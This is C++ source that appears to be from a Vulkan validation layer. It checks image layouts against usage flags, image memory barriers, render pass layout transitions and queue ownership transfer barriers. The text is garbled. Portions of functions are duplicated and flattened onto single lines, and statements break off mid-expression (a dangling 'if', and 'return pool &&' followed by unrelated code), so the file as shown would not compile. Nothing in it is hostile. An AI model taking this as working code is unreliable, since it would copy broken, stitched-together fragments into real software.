// mismatched layout/usage combination; VUIDs differ between render pass v1 and v2 (KHR) begin paths.
bool CoreChecks::ValidateRenderPassLayoutAgainstFramebufferImageUsage(RenderPassCreateVersion rp_version, VkImageLayout layout,
                                                                      VkImage image, VkImageView image_view,
                                                                      VkFramebuffer framebuffer, VkRenderPass renderpass,
                                                                      uint32_t attachment_index, const char *variable_name) {
    bool skip = false;
    auto image_state = GetImageState(image);
    const char *vuid;
    const bool use_rp2 = (rp_version == RENDER_PASS_VERSION_2);

    // No tracked state for the image: the view references an invalid/destroyed image.
    if (!image_state) {
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image),
                        "VUID-VkRenderPassBeginInfo-framebuffer-parameter",
                        "Render Pass begin with renderpass %s uses framebuffer %s where pAttachments[%" PRIu32
                        "] = image view %s, which refers to an invalid image",
                        report_data->FormatHandle(renderpass).c_str(), report_data->FormatHandle(framebuffer).c_str(),
                        attachment_index, report_data->FormatHandle(image_view).c_str());
        return skip;
    }

    auto image_usage = image_state->createInfo.usage;

    // Check for layouts that mismatch image usages in the framebuffer
    if (layout == VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL && !(image_usage & VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT)) {
        vuid = use_rp2 ? "VUID-vkCmdBeginRenderPass2KHR-initialLayout-03094" : "VUID-vkCmdBeginRenderPass-initialLayout-00895";
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image),
                        vuid,
                        "Layout/usage mismatch for attachment %u in render pass %s"
                        " - the %s is %s but the image attached to framebuffer %s via image view %s"
                        " was not created with VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT",
                        attachment_index, report_data->FormatHandle(renderpass).c_str(), variable_name,
                        string_VkImageLayout(layout), report_data->FormatHandle(framebuffer).c_str(),
                        report_data->FormatHandle(image_view).c_str());
    }

    if (layout == VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL &&
        !(image_usage & (VK_IMAGE_USAGE_INPUT_ATTACHMENT_BIT | VK_IMAGE_USAGE_SAMPLED_BIT))) {
        vuid = use_rp2 ? "VUID-vkCmdBeginRenderPass2KHR-initialLayout-03097" : "VUID-vkCmdBeginRenderPass-initialLayout-00897";
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image),
                        vuid,
                        "Layout/usage mismatch for attachment %u in render pass %s"
                        " - the %s is %s but the image attached to framebuffer %s via image view %s"
                        " was not created with VK_IMAGE_USAGE_INPUT_ATTACHMENT_BIT or VK_IMAGE_USAGE_SAMPLED_BIT",
                        attachment_index, report_data->FormatHandle(renderpass).c_str(), variable_name,
                        string_VkImageLayout(layout), report_data->FormatHandle(framebuffer).c_str(),
                        report_data->FormatHandle(image_view).c_str());
    }

    if (layout == VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL && !(image_usage & VK_IMAGE_USAGE_TRANSFER_SRC_BIT)) {
        vuid = use_rp2 ? "VUID-vkCmdBeginRenderPass2KHR-initialLayout-03098" : "VUID-vkCmdBeginRenderPass-initialLayout-00898";
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image),
                        vuid,
                        "Layout/usage mismatch for attachment %u in render pass %s"
                        " - the %s is %s but the image attached to framebuffer %s via image view %s"
                        " was not created with VK_IMAGE_USAGE_TRANSFER_SRC_BIT",
                        attachment_index, report_data->FormatHandle(renderpass).c_str(), variable_name,
                        string_VkImageLayout(layout), report_data->FormatHandle(framebuffer).c_str(),
                        report_data->FormatHandle(image_view).c_str());
    }

    if (layout == VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL && !(image_usage & VK_IMAGE_USAGE_TRANSFER_DST_BIT)) {
        vuid = use_rp2 ? "VUID-vkCmdBeginRenderPass2KHR-initialLayout-03099" : "VUID-vkCmdBeginRenderPass-initialLayout-00899";
        skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image),
                        vuid,
                        "Layout/usage mismatch for attachment %u in render pass %s"
                        " - the %s is %s but the image attached to framebuffer %s via image view %s"
                        " was not created with VK_IMAGE_USAGE_TRANSFER_DST_BIT",
                        attachment_index, report_data->FormatHandle(renderpass).c_str(), variable_name,
                        string_VkImageLayout(layout), report_data->FormatHandle(framebuffer).c_str(),
                        report_data->FormatHandle(image_view).c_str());
    }

    if (GetDeviceExtensions()->vk_khr_maintenance2) {
        // maintenance2 adds the mixed depth/stencil read-only layouts; validate all four DS layouts here.
        if ((layout == VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL ||
             layout == VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL ||
             layout == VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL ||
             layout == VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL) &&
            !(image_usage & VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT)) {
            vuid = use_rp2 ? "VUID-vkCmdBeginRenderPass2KHR-initialLayout-03096" : "VUID-vkCmdBeginRenderPass-initialLayout-01758";
            skip |= log_msg(
                report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), vuid,
                "Layout/usage mismatch for attachment %u in render pass %s"
                " - the %s is %s but the image attached to framebuffer %s via image view %s"
                " was not created with VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT",
                attachment_index, report_data->FormatHandle(renderpass).c_str(), variable_name, string_VkImageLayout(layout),
                report_data->FormatHandle(framebuffer).c_str(), report_data->FormatHandle(image_view).c_str());
        }
    } else {
        // The create render pass 2 extension requires maintenance 2 (the previous branch), so no vuid switch needed here.
        if ((layout == VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL ||
             layout == VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL) &&
            !(image_usage & VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT)) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT,
                            HandleToUint64(image), "VUID-vkCmdBeginRenderPass-initialLayout-00896",
                            "Layout/usage mismatch for attachment %u in render pass %s"
                            " - the %s is %s but the image attached to framebuffer %s via image view %s"
                            " was not created with VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT",
                            attachment_index, report_data->FormatHandle(renderpass).c_str(), variable_name,
                            string_VkImageLayout(layout), report_data->FormatHandle(framebuffer).c_str(),
                            report_data->FormatHandle(image_view).c_str());
        }
    }
    return skip;
}
if ((layout == VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL || layout == VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL) && !(image_usage & VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-vkCmdBeginRenderPass-initialLayout-00896", "Layout/usage mismatch for attachment %u in render pass %s" " - the %s is %s but the image attached to framebuffer %s via image view %s" " was not created with VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT", attachment_index, report_data->FormatHandle(renderpass).c_str(), variable_name, string_VkImageLayout(layout), report_data->FormatHandle(framebuffer).c_str(), report_data->FormatHandle(image_view).c_str()); } } return skip; } bool CoreChecks::VerifyFramebufferAndRenderPassLayouts(RenderPassCreateVersion rp_version, GLOBAL_CB_NODE *pCB, const VkRenderPassBeginInfo *pRenderPassBegin, const FRAMEBUFFER_STATE *framebuffer_state) { bool skip = false; auto const pRenderPassInfo = GetRenderPassState(pRenderPassBegin->renderPass)->createInfo.ptr(); auto const &framebufferInfo = framebuffer_state->createInfo; auto render_pass = GetRenderPassState(pRenderPassBegin->renderPass)->renderPass; auto framebuffer = framebuffer_state->framebuffer; if (pRenderPassInfo->attachmentCount != framebufferInfo.attachmentCount) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(pCB->commandBuffer), kVUID_Core_DrawState_InvalidRenderpass, "You cannot start a render pass using a framebuffer with a different number of attachments."); } for (uint32_t i = 0; i < pRenderPassInfo->attachmentCount; ++i) { const VkImageView &image_view = framebufferInfo.pAttachments[i]; auto view_state = GetImageViewState(image_view); if (!view_state) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_RENDER_PASS_EXT, 
HandleToUint64(pRenderPassBegin->renderPass), "VUID-VkRenderPassBeginInfo-framebuffer-parameter", "vkCmdBeginRenderPass(): framebuffer %s pAttachments[%" PRIu32 "] = %s is not a valid VkImageView handle", report_data->FormatHandle(framebuffer_state->framebuffer).c_str(), i, report_data->FormatHandle(image_view).c_str()); continue; } const VkImage &image = view_state->create_info.image; const VkImageSubresourceRange &subRange = view_state->create_info.subresourceRange; auto initial_layout = pRenderPassInfo->pAttachments[i].initialLayout; auto final_layout = pRenderPassInfo->pAttachments[i].finalLayout; // TODO: Do not iterate over every possibility - consolidate where possible for (uint32_t j = 0; j < subRange.levelCount; j++) { uint32_t level = subRange.baseMipLevel + j; for (uint32_t k = 0; k < subRange.layerCount; k++) { uint32_t layer = subRange.baseArrayLayer + k; VkImageSubresource sub = {subRange.aspectMask, level, layer}; IMAGE_CMD_BUF_LAYOUT_NODE node; if (!FindCmdBufLayout(pCB, image, sub, node)) { // Missing layouts will be added during state update continue; } if (initial_layout != VK_IMAGE_LAYOUT_UNDEFINED && initial_layout != node.layout) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidRenderpass, "You cannot start a render pass using attachment %u where the render pass initial layout is %s " "and the previous known layout of the attachment is %s. 
The layouts must match, or the render " "pass initial layout for the attachment must be VK_IMAGE_LAYOUT_UNDEFINED", i, string_VkImageLayout(initial_layout), string_VkImageLayout(node.layout)); } } } ValidateRenderPassLayoutAgainstFramebufferImageUsage(rp_version, initial_layout, image, image_view, framebuffer, render_pass, i, "initial layout"); ValidateRenderPassLayoutAgainstFramebufferImageUsage(rp_version, final_layout, image, image_view, framebuffer, render_pass, i, "final layout"); } for (uint32_t j = 0; j < pRenderPassInfo->subpassCount; ++j) { auto &subpass = pRenderPassInfo->pSubpasses[j]; for (uint32_t k = 0; k < pRenderPassInfo->pSubpasses[j].inputAttachmentCount; ++k) { auto &attachment_ref = subpass.pInputAttachments[k]; if (attachment_ref.attachment != VK_ATTACHMENT_UNUSED) { auto image_view = framebufferInfo.pAttachments[attachment_ref.attachment]; auto view_state = GetImageViewState(image_view); if (view_state) { auto image = view_state->create_info.image; ValidateRenderPassLayoutAgainstFramebufferImageUsage(rp_version, attachment_ref.layout, image, image_view, framebuffer, render_pass, attachment_ref.attachment, "input attachment layout"); } } } for (uint32_t k = 0; k < pRenderPassInfo->pSubpasses[j].colorAttachmentCount; ++k) { auto &attachment_ref = subpass.pColorAttachments[k]; if (attachment_ref.attachment != VK_ATTACHMENT_UNUSED) { auto image_view = framebufferInfo.pAttachments[attachment_ref.attachment]; auto view_state = GetImageViewState(image_view); if (view_state) { auto image = view_state->create_info.image; ValidateRenderPassLayoutAgainstFramebufferImageUsage(rp_version, attachment_ref.layout, image, image_view, framebuffer, render_pass, attachment_ref.attachment, "color attachment layout"); if (subpass.pResolveAttachments) { ValidateRenderPassLayoutAgainstFramebufferImageUsage(rp_version, attachment_ref.layout, image, image_view, framebuffer, render_pass, attachment_ref.attachment, "resolve attachment layout"); } } } } if 
// Record the layout transition implied by an attachment reference: set the referenced view's
// tracked layout to |ref.layout|. No-op for VK_ATTACHMENT_UNUSED or a missing view state.
void CoreChecks::TransitionAttachmentRefLayout(GLOBAL_CB_NODE *pCB, FRAMEBUFFER_STATE *pFramebuffer,
                                               const safe_VkAttachmentReference2KHR &ref) {
    if (ref.attachment != VK_ATTACHMENT_UNUSED) {
        auto image_view = GetAttachmentImageViewState(pFramebuffer, ref.attachment);
        if (image_view) {
            SetImageViewLayout(pCB, image_view, ref.layout);
        }
    }
}

// Apply the layout transitions of subpass |subpass_index|: every input, color, and depth/stencil
// attachment reference moves its view to the layout named by the reference.
void CoreChecks::TransitionSubpassLayouts(GLOBAL_CB_NODE *pCB, const RENDER_PASS_STATE *render_pass_state,
                                          const int subpass_index, FRAMEBUFFER_STATE *framebuffer_state) {
    assert(render_pass_state);

    if (framebuffer_state) {
        auto const &subpass = render_pass_state->createInfo.pSubpasses[subpass_index];
        for (uint32_t j = 0; j < subpass.inputAttachmentCount; ++j) {
            TransitionAttachmentRefLayout(pCB, framebuffer_state, subpass.pInputAttachments[j]);
        }
        for (uint32_t j = 0; j < subpass.colorAttachmentCount; ++j) {
            TransitionAttachmentRefLayout(pCB, framebuffer_state, subpass.pColorAttachments[j]);
        }
        if (subpass.pDepthStencilAttachment) {
            TransitionAttachmentRefLayout(pCB, framebuffer_state, *subpass.pDepthStencilAttachment);
        }
    }
}

// Validate one aspect of one (level, layer) subresource against an image barrier's oldLayout.
// Returns true (an error was logged) when the barrier's oldLayout disagrees with the layout tracked
// on the command buffer; returns false when the aspect is absent, untracked, or matches.
bool CoreChecks::ValidateImageAspectLayout(GLOBAL_CB_NODE const *pCB, const VkImageMemoryBarrier *mem_barrier, uint32_t level,
                                           uint32_t layer, VkImageAspectFlags aspect) {
    if (!(mem_barrier->subresourceRange.aspectMask & aspect)) {
        return false;
    }
    VkImageSubresource sub = {aspect, level, layer};
    IMAGE_CMD_BUF_LAYOUT_NODE node;
    if (!FindCmdBufLayout(pCB, mem_barrier->image, sub, node)) {
        return false;
    }
    bool skip = false;
    if (mem_barrier->oldLayout == VK_IMAGE_LAYOUT_UNDEFINED) {
        // oldLayout UNDEFINED is always legal (contents may be discarded).
        // TODO: Set memory invalid which is in mem_tracker currently
    } else if (node.layout != mem_barrier->oldLayout) {
        skip = log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                       HandleToUint64(pCB->commandBuffer), "VUID-VkImageMemoryBarrier-oldLayout-01197",
                       "For image %s you cannot transition the layout of aspect=%d level=%d layer=%d from %s when current layout is %s.",
                       report_data->FormatHandle(mem_barrier->image).c_str(), aspect, level, layer,
                       string_VkImageLayout(mem_barrier->oldLayout), string_VkImageLayout(node.layout));
    }
    return skip;
}
// Transition the layout state for renderpass attachments based on the BeginRenderPass() call. This includes:
// 1. Transition into initialLayout state
// 2. Transition from initialLayout to layout used in subpass 0
void CoreChecks::TransitionBeginRenderPassLayouts(GLOBAL_CB_NODE *cb_state, const RENDER_PASS_STATE *render_pass_state,
                                                  FRAMEBUFFER_STATE *framebuffer_state) {
    // First transition into initialLayout
    auto const rpci = render_pass_state->createInfo.ptr();
    for (uint32_t i = 0; i < rpci->attachmentCount; ++i) {
        auto view_state = GetAttachmentImageViewState(framebuffer_state, i);
        if (view_state) {
            SetImageViewLayout(cb_state, view_state, rpci->pAttachments[i].initialLayout);
        }
    }
    // Now transition for first subpass (index 0)
    TransitionSubpassLayouts(cb_state, render_pass_state, 0, framebuffer_state);
}

// Record the layout transition of one aspect of one (level, layer) subresource caused by an image barrier.
// If the subresource is not yet tracked on this command buffer, record both old and new layouts
// (the old layout becomes the expected incoming layout); otherwise just update to the new layout.
void CoreChecks::TransitionImageAspectLayout(GLOBAL_CB_NODE *pCB, const VkImageMemoryBarrier *mem_barrier, uint32_t level,
                                             uint32_t layer, VkImageAspectFlags aspect_mask, VkImageAspectFlags aspect) {
    if (!(aspect_mask & aspect)) {
        return;
    }
    VkImageSubresource sub = {aspect, level, layer};
    IMAGE_CMD_BUF_LAYOUT_NODE node;
    if (!FindCmdBufLayout(pCB, mem_barrier->image, sub, node)) {
        pCB->image_layout_change_count++;  // Change the version of this data to force revalidation
        SetLayout(pCB, mem_barrier->image, sub, IMAGE_CMD_BUF_LAYOUT_NODE(mem_barrier->oldLayout, mem_barrier->newLayout));
        return;
    }
    if (mem_barrier->oldLayout == VK_IMAGE_LAYOUT_UNDEFINED) {
        // TODO: Set memory invalid
    }
    SetLayout(pCB, mem_barrier->image, sub, mem_barrier->newLayout);
}
version of this data to force revalidation SetLayout(pCB, mem_barrier->image, sub, IMAGE_CMD_BUF_LAYOUT_NODE(mem_barrier->oldLayout, mem_barrier->newLayout)); return; } if (mem_barrier->oldLayout == VK_IMAGE_LAYOUT_UNDEFINED) { // TODO: Set memory invalid } SetLayout(pCB, mem_barrier->image, sub, mem_barrier->newLayout); } bool VerifyAspectsPresent(VkImageAspectFlags aspect_mask, VkFormat format) { if ((aspect_mask & VK_IMAGE_ASPECT_COLOR_BIT) != 0) { if (!(FormatIsColor(format) || FormatIsMultiplane(format))) return false; } if ((aspect_mask & VK_IMAGE_ASPECT_DEPTH_BIT) != 0) { if (!FormatHasDepth(format)) return false; } if ((aspect_mask & VK_IMAGE_ASPECT_STENCIL_BIT) != 0) { if (!FormatHasStencil(format)) return false; } if (0 != (aspect_mask & (VK_IMAGE_ASPECT_PLANE_0_BIT_KHR | VK_IMAGE_ASPECT_PLANE_1_BIT_KHR | VK_IMAGE_ASPECT_PLANE_2_BIT_KHR))) { if (FormatPlaneCount(format) == 1) return false; } return true; } // Verify an ImageMemoryBarrier's old/new ImageLayouts are compatible with the Image's ImageUsageFlags. bool CoreChecks::ValidateBarrierLayoutToImageUsage(const VkImageMemoryBarrier *img_barrier, bool new_not_old, VkImageUsageFlags usage_flags, const char *func_name) { bool skip = false; const VkImageLayout layout = (new_not_old) ? 
img_barrier->newLayout : img_barrier->oldLayout; const char *msg_code = kVUIDUndefined; // sentinel value meaning "no error" switch (layout) { case VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL: if ((usage_flags & VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT) == 0) { msg_code = "VUID-VkImageMemoryBarrier-oldLayout-01208"; } break; case VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL: if ((usage_flags & VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT) == 0) { msg_code = "VUID-VkImageMemoryBarrier-oldLayout-01209"; } break; case VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL: if ((usage_flags & VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT) == 0) { msg_code = "VUID-VkImageMemoryBarrier-oldLayout-01210"; } break; case VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL: if ((usage_flags & (VK_IMAGE_USAGE_SAMPLED_BIT | VK_IMAGE_USAGE_INPUT_ATTACHMENT_BIT)) == 0) { msg_code = "VUID-VkImageMemoryBarrier-oldLayout-01211"; } break; case VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL: if ((usage_flags & VK_IMAGE_USAGE_TRANSFER_SRC_BIT) == 0) { msg_code = "VUID-VkImageMemoryBarrier-oldLayout-01212"; } break; case VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL: if ((usage_flags & VK_IMAGE_USAGE_TRANSFER_DST_BIT) == 0) { msg_code = "VUID-VkImageMemoryBarrier-oldLayout-01213"; } break; case VK_IMAGE_LAYOUT_SHADING_RATE_OPTIMAL_NV: if ((usage_flags & VK_IMAGE_USAGE_SHADING_RATE_IMAGE_BIT_NV) == 0) { msg_code = "VUID-VkImageMemoryBarrier-oldLayout-02088"; } break; default: // Other VkImageLayout values do not have VUs defined in this context. break; } if (msg_code != kVUIDUndefined) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(img_barrier->image), msg_code, "%s: Image barrier 0x%p %sLayout=%s is not compatible with image %s usage flags 0x%" PRIx32 ".", func_name, static_cast<const void *>(img_barrier), ((new_not_old) ? 
"new" : "old"), string_VkImageLayout(layout), report_data->FormatHandle(img_barrier->image).c_str(), usage_flags); } return skip; } // Scoreboard for checking for duplicate and inconsistent barriers to images struct ImageBarrierScoreboardEntry { uint32_t index; // This is designed for temporary storage within the scope of the API call. If retained storage of the barriers is // required, copies should be made and smart or unique pointers used in some other stucture (or this one refactored) const VkImageMemoryBarrier *barrier; }; using ImageBarrierScoreboardSubresMap = std::unordered_map<VkImageSubresourceRange, ImageBarrierScoreboardEntry>; using ImageBarrierScoreboardImageMap = std::unordered_map<VkImage, ImageBarrierScoreboardSubresMap>; // Verify image barriers are compatible with the images they reference. bool CoreChecks::ValidateBarriersToImages(GLOBAL_CB_NODE const *cb_state, uint32_t imageMemoryBarrierCount, const VkImageMemoryBarrier *pImageMemoryBarriers, const char *func_name) { bool skip = false; // Scoreboard for duplicate layout transition barriers within the list // Pointers retained in the scoreboard only have the lifetime of *this* call (i.e. 
within the scope of the API call) ImageBarrierScoreboardImageMap layout_transitions; for (uint32_t i = 0; i < imageMemoryBarrierCount; ++i) { auto img_barrier = &pImageMemoryBarriers[i]; if (!img_barrier) continue; // Update the scoreboard of layout transitions and check for barriers affecting the same image and subresource // TODO: a higher precision could be gained by adapting the command_buffer image_layout_map logic looking for conflicts // at a per sub-resource level if (img_barrier->oldLayout != img_barrier->newLayout) { ImageBarrierScoreboardEntry new_entry{i, img_barrier}; auto image_it = layout_transitions.find(img_barrier->image); if (image_it != layout_transitions.end()) { auto &subres_map = image_it->second; auto subres_it = subres_map.find(img_barrier->subresourceRange); if (subres_it != subres_map.end()) { auto &entry = subres_it->second; if ((entry.barrier->newLayout != img_barrier->oldLayout) && (img_barrier->oldLayout != VK_IMAGE_LAYOUT_UNDEFINED)) { const VkImageSubresourceRange &range = img_barrier->subresourceRange; skip = log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_state->commandBuffer), "VUID-VkImageMemoryBarrier-oldLayout-01197", "%s: pImageMemoryBarrier[%u] conflicts with earlier entry pImageMemoryBarrier[%u]. 
Image %s" " subresourceRange: aspectMask=%u baseMipLevel=%u levelCount=%u, baseArrayLayer=%u, layerCount=%u; " "conflicting barrier transitions image layout from %s when earlier barrier transitioned to layout %s.", func_name, i, entry.index, report_data->FormatHandle(img_barrier->image).c_str(), range.aspectMask, range.baseMipLevel, range.levelCount, range.baseArrayLayer, range.layerCount, string_VkImageLayout(img_barrier->oldLayout), string_VkImageLayout(entry.barrier->newLayout)); } entry = new_entry; } else { subres_map[img_barrier->subresourceRange] = new_entry; } } else { layout_transitions[img_barrier->image][img_barrier->subresourceRange] = new_entry; } } auto image_state = GetImageState(img_barrier->image); if (image_state) { VkImageUsageFlags usage_flags = image_state->createInfo.usage; skip |= ValidateBarrierLayoutToImageUsage(img_barrier, false, usage_flags, func_name); skip |= ValidateBarrierLayoutToImageUsage(img_barrier, true, usage_flags, func_name); // Make sure layout is able to be transitioned, currently only presented shared presentable images are locked if (image_state->layout_locked) { // TODO: Add unique id for error when available skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(img_barrier->image), 0, "Attempting to transition shared presentable image %s" " from layout %s to layout %s, but image has already been presented and cannot have its layout transitioned.", report_data->FormatHandle(img_barrier->image).c_str(), string_VkImageLayout(img_barrier->oldLayout), string_VkImageLayout(img_barrier->newLayout)); } } VkImageCreateInfo *image_create_info = &(GetImageState(img_barrier->image)->createInfo); // For a Depth/Stencil image both aspects MUST be set if (FormatIsDepthAndStencil(image_create_info->format)) { auto const aspect_mask = img_barrier->subresourceRange.aspectMask; auto const ds_mask = VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT; if ((aspect_mask & 
ds_mask) != (ds_mask)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(img_barrier->image), "VUID-VkImageMemoryBarrier-image-01207", "%s: Image barrier 0x%p references image %s of format %s that must have the depth and stencil " "aspects set, but its aspectMask is 0x%" PRIx32 ".", func_name, static_cast<const void *>(img_barrier), report_data->FormatHandle(img_barrier->image).c_str(), string_VkFormat(image_create_info->format), aspect_mask); } } uint32_t level_count = ResolveRemainingLevels(&img_barrier->subresourceRange, image_create_info->mipLevels); uint32_t layer_count = ResolveRemainingLayers(&img_barrier->subresourceRange, image_create_info->arrayLayers); for (uint32_t j = 0; j < level_count; j++) { uint32_t level = img_barrier->subresourceRange.baseMipLevel + j; for (uint32_t k = 0; k < layer_count; k++) { uint32_t layer = img_barrier->subresourceRange.baseArrayLayer + k; skip |= ValidateImageAspectLayout(cb_state, img_barrier, level, layer, VK_IMAGE_ASPECT_COLOR_BIT); skip |= ValidateImageAspectLayout(cb_state, img_barrier, level, layer, VK_IMAGE_ASPECT_DEPTH_BIT); skip |= ValidateImageAspectLayout(cb_state, img_barrier, level, layer, VK_IMAGE_ASPECT_STENCIL_BIT); skip |= ValidateImageAspectLayout(cb_state, img_barrier, level, layer, VK_IMAGE_ASPECT_METADATA_BIT); if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) { skip |= ValidateImageAspectLayout(cb_state, img_barrier, level, layer, VK_IMAGE_ASPECT_PLANE_0_BIT_KHR); skip |= ValidateImageAspectLayout(cb_state, img_barrier, level, layer, VK_IMAGE_ASPECT_PLANE_1_BIT_KHR); skip |= ValidateImageAspectLayout(cb_state, img_barrier, level, layer, VK_IMAGE_ASPECT_PLANE_2_BIT_KHR); } } } } return skip; } bool CoreChecks::IsReleaseOp(GLOBAL_CB_NODE *cb_state, VkImageMemoryBarrier const *barrier) { if (!IsTransferOp(barrier)) return false; auto pool = GetCommandPoolNode(cb_state->createInfo.commandPool); return pool && 
// Warn when a queue-family-ownership (QFO) transfer barrier recorded in this command buffer duplicates
// a release/acquire already recorded in the same command buffer. |Barrier| is VkImageMemoryBarrier or
// VkBufferMemoryBarrier; the per-type record/set machinery is selected via QFOTransferBarrier<Barrier>::Tag.
template <typename Barrier>
bool CoreChecks::ValidateQFOTransferBarrierUniqueness(const char *func_name, GLOBAL_CB_NODE *cb_state, uint32_t barrier_count,
                                                      const Barrier *barriers) {
    using BarrierRecord = QFOTransferBarrier<Barrier>;
    bool skip = false;
    auto pool = GetCommandPoolNode(cb_state->createInfo.commandPool);
    auto &barrier_sets = GetQFOBarrierSets(cb_state, typename BarrierRecord::Tag());
    const char *barrier_name = BarrierRecord::BarrierName();
    const char *handle_name = BarrierRecord::HandleName();
    const char *transfer_type = nullptr;
    for (uint32_t b = 0; b < barrier_count; b++) {
        if (!IsTransferOp(&barriers[b])) continue;
        const BarrierRecord *barrier_record = nullptr;
        // "Special" (external/foreign) queue family indices are exempt from duplicate tracking.
        if (TempIsReleaseOp<Barrier, true /* Assume IsTransfer */>(pool, &barriers[b]) &&
            !IsSpecial(barriers[b].dstQueueFamilyIndex)) {
            const auto found = barrier_sets.release.find(barriers[b]);
            if (found != barrier_sets.release.cend()) {
                barrier_record = &(*found);
                transfer_type = "releasing";
            }
        } else if (IsAcquireOp<Barrier, true /*Assume IsTransfer */>(pool, &barriers[b]) &&
                   !IsSpecial(barriers[b].srcQueueFamilyIndex)) {
            const auto found = barrier_sets.acquire.find(barriers[b]);
            if (found != barrier_sets.acquire.cend()) {
                barrier_record = &(*found);
                transfer_type = "acquiring";
            }
        }
        if (barrier_record != nullptr) {
            skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                            HandleToUint64(cb_state->commandBuffer), BarrierRecord::ErrMsgDuplicateQFOInCB(),
                            "%s: %s at index %" PRIu32 " %s queue ownership of %s (%s), from srcQueueFamilyIndex %" PRIu32
                            " to dstQueueFamilyIndex %" PRIu32 " duplicates existing barrier recorded in this command buffer.",
                            func_name, barrier_name, b, transfer_type, handle_name,
                            report_data->FormatHandle(barrier_record->handle).c_str(), barrier_record->srcQueueFamilyIndex,
                            barrier_record->dstQueueFamilyIndex);
        }
    }
    return skip;
}

// Record the QFO release/acquire barriers of |barriers| into the command buffer's per-type barrier sets
// so later recordings and queue submits can detect duplicates.
template <typename Barrier>
void CoreChecks::RecordQFOTransferBarriers(GLOBAL_CB_NODE *cb_state, uint32_t barrier_count, const Barrier *barriers) {
    auto pool = GetCommandPoolNode(cb_state->createInfo.commandPool);
    auto &barrier_sets = GetQFOBarrierSets(cb_state, typename QFOTransferBarrier<Barrier>::Tag());
    for (uint32_t b = 0; b < barrier_count; b++) {
        if (!IsTransferOp(&barriers[b])) continue;
